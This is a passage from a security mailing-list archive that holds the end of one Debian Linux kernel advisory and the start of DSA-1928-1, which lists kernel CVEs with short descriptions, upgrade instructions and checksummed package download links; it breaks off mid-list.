    Size/MD5 checksum:   383280 0d0cad637c14a594b3ae424abf824608

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   365550 f97d5bcae3c5c5957781e6507d730780
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum: 12396344 04df2ffe832cba3ea1e299701069ca96
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   335184 ff1387cae5afb9c7b2d8b20ab546293f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:  4136850 e7e7742e3ead70e194f540432bf93ba6
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   747792 89242eec0e6f453f37b228ddb49e4e26
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum: 11680082 d9133e003cd603924930f1db870c6d46
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   106354 fce271c39eaa874f6a570b9298a13836
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-versatile_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:  9575158 d8c6ec6842339c8d8391916c7b4a25c2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum: 11371016 edc9b10b99e73302ef1853db546ed6bb
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   363118 ca61af313ac3687b042c82e4c56bd078
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-armel_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   106390 d14317d669c70ea8458b0138105be3e0
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-19lenny2_armel.deb
    Size/MD5 checksum:   360844 1c7437e1e4de9358f7975feae74501f0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum: 17070158 92d872205303ea622d1419d074b54737
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   296434 df3ddd0a0dbfa712201ff031bfc109c0
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum: 16323830 9998a4deead3033e07f28a1cd0816136
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   297894 8cace7fc519c562d4b8657c75d230815
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:  3594236 8d621635c43fb9540d4a68ef6d891a57
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   106356 f967499d62622f5f0833539c9eaf2359
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-hppa_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   106380 f518c1de9ce8dd272db1afa30e38999a
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum: 15731364 d50829b0556bc7fef6e8c505db959ee2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   759840 faab7849f3cef86fbebc037cbd00fd76
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum: 17614856 6311929870350217721f7f194b6ff585
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc64-smp_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   299160 57fd97b01842bbe74e37f443e346d695
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-19lenny2_hppa.deb
    Size/MD5 checksum:   298110 631076db8957d15ab8b0161a60e31734

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   398182 6f93bf37534bcfb9162b9985b83ee38f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20502134 d39255c90c67fddda4c3cb49ce6c93e1
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20235868 99b3ed110df3b6b2bb6b06feb9d30b72
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   106354 835280ec5ad990b0bcebb988953bd5d9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20326344 9192cd01f84e7192159aefec2c4f8fb9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20208578 c118b5d6fc4f5007728d1ab804624cd8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   398052 88be8c6ce0726c87f3127e1ea8b1a382
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20175038 ee7bf2ce4d4557f9fdfb53790627ebac
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:  3719206 0d8393bd6245aa3d23ef8938477d5f63
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20353680 67f48fcd0835fd230e8583cf2676cf09
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   398494 bf4ef1c3e9f35ec4dc0bfaeda1ee5516
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:  3851592 94a16944e91f5594a6fa02115b680434
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   400332 d734fb2f035f0a6a041d13f5a3d95c6c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   749582 26580da1f40ffeeb17146765bbe241f8
  http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   106348 b76709d63441fcc3e285d2a6dc999890
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 20864938 cc5255ece9764242c63b522abfd8a517
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   399328 c929aa19b40e7eea5ea885148c645a17
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:  3751908 3b936dbeaf13b730ab8dd56e5ab726f9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   387338 03fd54819fb7176a176eeb4c2ff0209c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   403790 efa7179643f2f709cace01bb3f4a5580
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:  3774936 088f38a8e9c79bb4ddc67e200ebee754
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:  1591850 93ad5d17c9e8ac22c3544c8a9ad9eabd
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   384698 5cc9137a10772a48628b0014e0dbbc15
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum:   106404 04d07f928e22a2150a2bb9188c6f1257
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-19lenny2_i386.deb
    Size/MD5 checksum: 18035618 641b34424aad0e9291713bd9e2bf96e5

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   355640 2bce0c1faefc019460e3eebca333a5fc
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:  3654768 d8fb31f9660b7c0ab42c77e89bf82f1f
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   355064 cfb3eee78e3860b2e650716d5032bf5d
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:  3687386 2980814479dbd08d39bd9f92d3005838
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   355046 62fc734ea7fe9bc4bef1f8d8b65cc027
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum: 34349456 5cfb3ccf034f0ce13a5861507c4cb758
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-itanium_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum: 34103026 3cee486177d22e2fcd816b536d7ac3d3
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   106350 6265837dd3c0105bcba9d40c5b6966f9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   355698 27152c116ad66c7862f3890d36ac80ab
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-mckinley_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum: 34288678 1540b7be96fbb68e4cc01d858c5ef5a4
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-ia64_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   106384 bfb7eeaec3d89587561c56afec1816e9
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum: 34165098 7a4fbe457d07807a74e9950a47975d49
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_ia64.deb
    Size/MD5 checksum:   748220 03f583157c7eef60269042b9a5a6d0bc

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   106358 5431bb9d2abe49fc1b186f44bf440cba
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   756032 fb287119a4cf07ef9d6d633ad30f7236
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   372504 9c0501a81bf32b1d0b8c939830d9789b
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum: 23650232 ece0b68e6c9baa2e0f964d2bc7da21a2
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:  3856256 5a6eb8c2fe7930456cf5f3a1c257fed1
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum: 23514630 0aa445df9e479dc6e266a97658c5c675
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum: 23453120 7fdf0e57cb3324433e8f5d3e71c5cb7c
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum: 23619598 7eb565a76c6ab3318d32c134f7da26b0
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   366586 3e8f8e0d8d9dc83a3e009bbdcca04d21
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:  3890668 a75da89a00e2b5118869888ea03580ae
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   373766 78d152d9edb14f5d179dde50a0131ea7
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   366686 4b13a456e727a9259685b74132c5b730
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   106396 33f493756428189d3acc36bde21631ed
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum:   365950 4149c4f9e6f3e0dc0fbb639a2f962cf8
  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-19lenny2_powerpc.deb
    Size/MD5 checksum: 23216978 b0034a3be5877f2edebf6ec71c70a83e

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFK8vsShuANDBmkLRkRAuztAKCAAmojb32U5ekaEbI3lWTPLYayHQCfQwhe
vHrSbR3EZNHJzNEAXPK0XqY=
=Synp
-----END PGP SIGNATURE-----


From dannf at debian.org  Thu Nov  5 22:03:48 2009
From: dannf at debian.org (dann frazier)
Date: Thu, 5 Nov 2009 15:03:48 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1928-1] New Linux 2.6.24 packages
	fix several vulnerabilities
Message-ID: <20091105220347.GA19388@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
Debian Security Advisory DSA-1928-1                security at debian.org
http://www.debian.org/security/                           Dann Frazier
November 5, 2009                    http://www.debian.org/security/faq
- ----------------------------------------------------------------------

Package        : linux-2.6.24
Vulnerability  : privilege escalation/denial of service/sensitive memory leak
Problem type   : local/remote
Debian-specific: no
CVE Id(s)      : CVE-2009-2846 CVE-2009-2847 CVE-2009-2848 CVE-2009-2849
                 CVE-2009-2903 CVE-2009-2908 CVE-2009-2909 CVE-2009-2910
                 CVE-2009-3001 CVE-2009-3002 CVE-2009-3228 CVE-2009-3238
                 CVE-2009-3286 CVE-2009-3547 CVE-2009-3612 CVE-2009-3613
                 CVE-2009-3620 CVE-2009-3621

Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service, sensitive memory leak or privilege
escalation.  The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2009-2846

    Michael Buesch noticed a typing issue in the eisa-eeprom driver
    for the hppa architecture. Local users could exploit this issue to
    gain access to restricted memory.

CVE-2009-2847

    Ulrich Drepper noticed an issue in the do_sigalstack routine on
    64-bit systems. This issue allows local users to gain access to
    potentially sensitive memory on the kernel stack.

CVE-2009-2848

    Eric Dumazet discovered an issue in the execve path, where the
    clear_child_tid variable was not being properly cleared. Local
    users could exploit this issue to cause a denial of service
    (memory corruption).

CVE-2009-2849

    Neil Brown discovered an issue in the sysfs interface to md
    devices. When md arrays are not active, local users can exploit
    this vulnerability to cause a denial of service (oops).

CVE-2009-2903

    Mark Smith discovered a memory leak in the appletalk
    implementation.  When the appletalk and ipddp modules are loaded,
    but no ipddp"N" device is found, remote attackers can cause a
    denial of service by consuming large amounts of system memory.

CVE-2009-2908

    Loic Minier discovered an issue in the eCryptfs filesystem. A
    local user can cause a denial of service (kernel oops) by causing
    a dentry value to go negative.

CVE-2009-2909

    Arjan van de Ven discovered an issue in the AX.25 protocol
    implementation. A specially crafted call to setsockopt() can
    result in a denial of service (kernel oops).

CVE-2009-2910

    Jan Beulich discovered the existence of a sensitive kernel memory
    leak. Systems running the 'amd64' kernel do not properly sanitize
    registers for 32-bit processes.

CVE-2009-3001

    Jiri Slaby fixed a sensitive memory leak issue in the ANSI/IEEE
    802.2 LLC implementation. This is not exploitable in the Debian
    lenny kernel as root privileges are required to exploit this
    issue.

CVE-2009-3002

    Eric Dumazet fixed several sensitive memory leaks in the IrDA,
    X.25 PLP (Rose), NET/ROM, Acorn Econet/AUN, and Controller Area
    Network (CAN) implementations. Local users can exploit these
    issues to gain access to kernel memory.

CVE-2009-3228

    Eric Dumazet reported an instance of uninitialized kernel memory
    in the network packet scheduler. Local users may be able to
    exploit this issue to read the contents of sensitive kernel
    memory.
  
CVE-2009-3238

    Linus Torvalds provided a change to the get_random_int() function
    to increase its randomness.

CVE-2009-3286

    Eric Paris discovered an issue with the NFSv4 server
    implementation.  When an O_EXCL create fails, files may be left
    with corrupted permissions, possibly granting unintentional
    privileges to other local users.

CVE-2009-3547

    Earl Chew discovered a NULL pointer dereference issue in the
    pipe_rdwr_open function which can be used by local users to gain
    elevated privileges.

CVE-2009-3612

    Jiri Pirko discovered a typo in the initialization of a structure
    in the netlink subsystem that may allow local users to gain access
    to sensitive kernel memory.

CVE-2009-3613

    Alistair Strachan reported an issue in the r8169 driver. Remote
    users can cause a denial of service (IOMMU space exhaustion and
    system crash) by transmitting a large amount of jumbo frames.

CVE-2009-3620

    Ben Hutchings discovered an issue in the DRM manager for ATI Rage
    128 graphics adapters. Local users may be able to exploit this
    vulnerability to cause a denial of service (NULL pointer
    dereference).

CVE-2009-3621

    Tomoki Sekiyama discovered a deadlock condition in the UNIX domain
    socket implementation. Local users can exploit this vulnerability
    to cause a denial of service (system hang).

For the oldstable distribution (etch), this problem has been fixed in
version 2.6.24-6~etchnhalf.9etch1.

We recommend that you upgrade your linux-2.6.24 packages.

Note: Debian 'etch' includes linux kernel packages based upon both the
2.6.18 and 2.6.24 linux releases.  All known security issues are
carefully tracked against both packages and both packages will receive
security updates until security support for Debian 'etch'
concludes. However, given the high frequency at which low-severity
security issues are discovered in the kernel and the resource
requirements of doing an update, lower severity 2.6.18 and 2.6.24
updates will typically release in a staggered or "leap-frog" fashion.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Oldstable updates are available for alpha, amd64, hppa, i386, ia64, and mipsel.
Updates for other architectures will be released as the they become available.

Source archives:

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch1.dsc
    Size/MD5 checksum:     5118 11c39e0f0505c5a71453ba177ec2f780
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch1.diff.gz
    Size/MD5 checksum:  4062851 38835b393eaf53915dbee39ef0ef0bce
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz
    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum:  4262022 bb1c503dcb847b700814d433cdddb1f9
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum:    83302 2a8576eb3003b7ba1ead19ad7ef6ce0c
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum:  1548296 3e044fb0d0bb8614f787f78fee86ce04
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum: 46864328 20c0417498421842a7175074aea06a0f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum:    97672 b1aa55ab4464293f5dac5b38e05948bb
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch1_all.deb
    Size/MD5 checksum:   964124 a40463a66e93920bdd639d2c70d870cb

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:    82894 819512914da24a2d82d471a17a6126ea
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:   332670 c249c0b58448936c450c26b1340994d0
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum: 26758158 1a5497e6cd4f62b36f4cfdae9a606e24
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum: 26737882 fc949e1dbc0d0c6c7688148babdfd5d1
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:  3454880 83a5e26b99def049eec7571242778961
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:   332158 8f3a3adf61a6e150763a383d4b566db2
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:   330952 0ec11881ba63842e135d3752a765177d
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum:    82868 b5396790365bab5a2d032d1b3bece1ed
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch1_alpha.deb
    Size/MD5 checksum: 27341634 d11f40ed34af0197de7f61ef07d30abb

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch1_amd64.deb
    Size/MD5 checksum:   354620 0decd6646f19383f6958e5d90b92e87b
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_amd64.deb
    Size/MD5 checksum:    82864 2869e673de24c9741042e2bb37f84d58
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_amd64.deb
    Size/MD5 checksum:  3650612 1b0f205b955558d402611693f783c495
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch1_amd64.deb
    Size/MD5 checksum: 19598112 ed3b7a91d93a116a4b175d173ad0f078
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch1_amd64.deb
    Size/MD5 checksum:    82872 c560fbca727844a090f88f9d6569ed0b

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:    82992 1604c10382bd677723af0a811fdb466f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:   258316 90502abd75a09ceed13a5efd22e996c5
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:  3445284 32e69244553a870750d771254d1c95bd
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:   258996 fc63f1ef7e55c899b9ef2d736bc5e648
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:   260542 97df4eda2fbd582dd6951bb1b7f31e85
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum: 14830274 fb45fe9d1b77d908d5adbb353b211994
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:   261064 f5d2cbb6216c1ffebbd73153a75e75a5
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum:    83020 103285de6aad099908a2fedbbca24069
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum: 13847626 3c429ea0e61a446b3e7b13b943eafcb5
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum: 14374844 760d7850faff110d14494c86095aa45c
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch1_hppa.deb
    Size/MD5 checksum: 13335298 2b476692a155f3f735f3af76f7170cd8

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch1_i386.deb
